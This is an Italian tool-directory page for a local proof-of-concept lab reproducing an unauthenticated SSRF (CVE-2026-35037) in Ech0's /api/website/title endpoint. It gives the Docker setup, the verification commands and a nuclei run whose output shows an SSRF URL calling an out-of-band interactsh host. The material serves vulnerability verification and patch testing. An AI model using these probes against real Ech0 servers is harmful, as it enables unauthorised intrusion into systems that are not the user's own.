Skip to content
KitploitKITPLOIT
StrumentiBlog
Log in
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

FeedContattoPrivacy© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
POC_CVE-2026-35037 — Laboratorio di riproduzione isolato locale per CVE-2026-35037, una vulnerabilità SSRF non autenticata nell'endpoint GET /api/website/title di Ech0. Include configurazione Docker Compose, script di verifica e modello nuclei per la validazione. | Kitploit
Strumenti/GitHubGitHub/fineman999/poc_cve-2026-35037
Analisi delle VulnerabilitàExploitSicurezza WebPenetration TestingApprendimento e FormazioneLab e Pratica
GitHubfineman999/poc_cve-2026-35037

POC_CVE-2026-35037

Laboratorio di riproduzione isolato locale per CVE-2026-35037, una vulnerabilità SSRF non autenticata nell'endpoint GET /api/website/title di Ech0. Include configurazione Docker Compose, script di verifica e modello nuclei per la validazione.

Vedi Repository
24 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2026-35037 Laboratorio SSRF Ech0

Questo repository contiene un laboratorio di riproduzione locale e isolato per CVE-2026-35037, una vulnerabilità SSRF non autenticata nell'endpoint GET /api/website/title di Ech0.

Il laboratorio utilizza un server di evidenza locale controllato invece di metadati cloud o infrastruttura di terze parti.

Riepilogo

  • Prodotto: lin-snow/Ech0
  • Vulnerabilità: Server-Side Request Forgery
  • CVE: CVE-2026-35037
  • GHSA: GHSA-cqgf-f4x7-g6wc
  • Versioni affette: GHSA elenca <= 4.2.1; NVD descrive versioni precedenti a 4.2.8
  • Versione corretta: 4.2.8
  • Endpoint: GET /api/website/title
  • Parametro: website_url
  • Autenticazione: non richiesta nella versione vulnerabile

Riferimenti:

  • https://nvd.nist.gov/vuln/detail/CVE-2026-35037
  • https://github.com/lin-snow/Ech0/security/advisories/GHSA-cqgf-f4x7-g6wc

File

  • docker-compose.yml: avvia Ech0 e un server HTTP di evidenza locale
  • Dockerfile.ech0-lab: costruisce Ech0 dal tag GitHub ufficiale
  • verify-cve-2026-35037.sh: invia la richiesta di verifica SSRF controllata
  • evidence/index.html: pagina HTML controllata con un <title> univoco
  • nuclei/CVE-2026-35037.yaml: template nuclei candidato

Perché compilare dal sorgente?

I tag Docker vulnerabili storici come sn0wl1n/ech0:4.2.1 non erano disponibili quando questo laboratorio è stato creato. Il laboratorio utilizza invece i tag GitHub ufficiali lin-snow/Ech0:

  • v4.2.1 per il candidato vulnerabile
  • v4.2.8 per il confronto corretto

Il Dockerfile locale evita anche i problemi di compilazione a monte osservati con il precedente build.Dockerfile.

Requisiti

  • Docker Engine o Docker Desktop
  • curl
  • Opzionale: nuclei

Eseguire questo solo in un laboratorio locale isolato. Non utilizzare questi comandi contro sistemi di terze parti. Usare solo contro sistemi di cui si è proprietari o per i quali si ha esplicita autorizzazione scritta per il test.

Riprodurre il comportamento vulnerabile

Avviare Ech0 v4.2.1:

ECH0_TAG=4.2.1 docker compose up -d --build

Inviare la richiesta di verifica controllata:

sh verify-cve-2026-35037.sh

Risposta vulnerabile prevista:

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8

{"code":1,"msg":"获取网站标题成功","data":"ECH0-SSRF-CVE-2026-35037"}

Confermare che Ech0 ha raggiunto il server di evidenza controllato:

docker compose logs evidence

Registro di evidenza osservato:

ech0-cve-2026-35037-evidence  | 192.168.107.3 - - [20/May/2026 03:48:51] "GET / HTTP/1.1" 200 -

Confrontare la versione corretta

Avviare Ech0 v4.2.8:

docker compose down -v
ECH0_TAG=4.2.8 docker compose up -d --build

Eseguire la stessa richiesta:

sh verify-cve-2026-35037.sh

Risposta corretta osservata:

HTTP/1.1 401 Unauthorized
Content-Type: application/json; charset=utf-8

{"code":0,"msg":"未找到令牌,请点击右上角登录","error_code":"TOKEN_MISSING","message_key":"auth.token_missing","data":null}

Validazione con Nuclei

Validare il template:

nuclei -validate -t nuclei/CVE-2026-35037.yaml

Eseguire contro il vulnerabile v4.2.1:

nuclei -t nuclei/CVE-2026-35037.yaml -u http://127.0.0.1:6277

Risultato vulnerabile osservato:

[INF] Using Interactsh Server: oast.online
[CVE-2026-35037] [http] [high] http://127.0.0.1:6277/api/website/title?website_url=http://d86j283ea0u4jbaqj8dgo4cgc4jhn7r3f.oast.online/
[INF] Scan completed in 6.425886625s. 1 matches found.

Eseguire contro il corretto v4.2.8:

nuclei -t nuclei/CVE-2026-35037.yaml -u http://127.0.0.1:6277

Risultato corretto osservato:

[INF] Using Interactsh Server: oast.fun
[INF] Scan completed in 5.974574416s. No results found.

Pulizia

docker compose down -v

Note

  • Il laboratorio manuale utilizza http://evidence:8080/ all'interno della rete Docker Compose.
  • Il template nuclei utilizza {{interactsh-url}} e richiede il supporto OAST/interactsh.
  • Il template nuclei utilizza {{interactsh-url}}, che contatta di default i server interactsh di ProjectDiscovery come oast.online o oast.fun. Usare -iserver per sovrascrivere il server o -ni per disabilitare interactsh.
  • Il laboratorio non sonda endpoint di metadati cloud.
  • Il laboratorio non contatta destinazioni di produzione o di terze parti, ad eccezione dei normali download di dipendenze/immagini durante la compilazione Docker.
Scarica lo strumento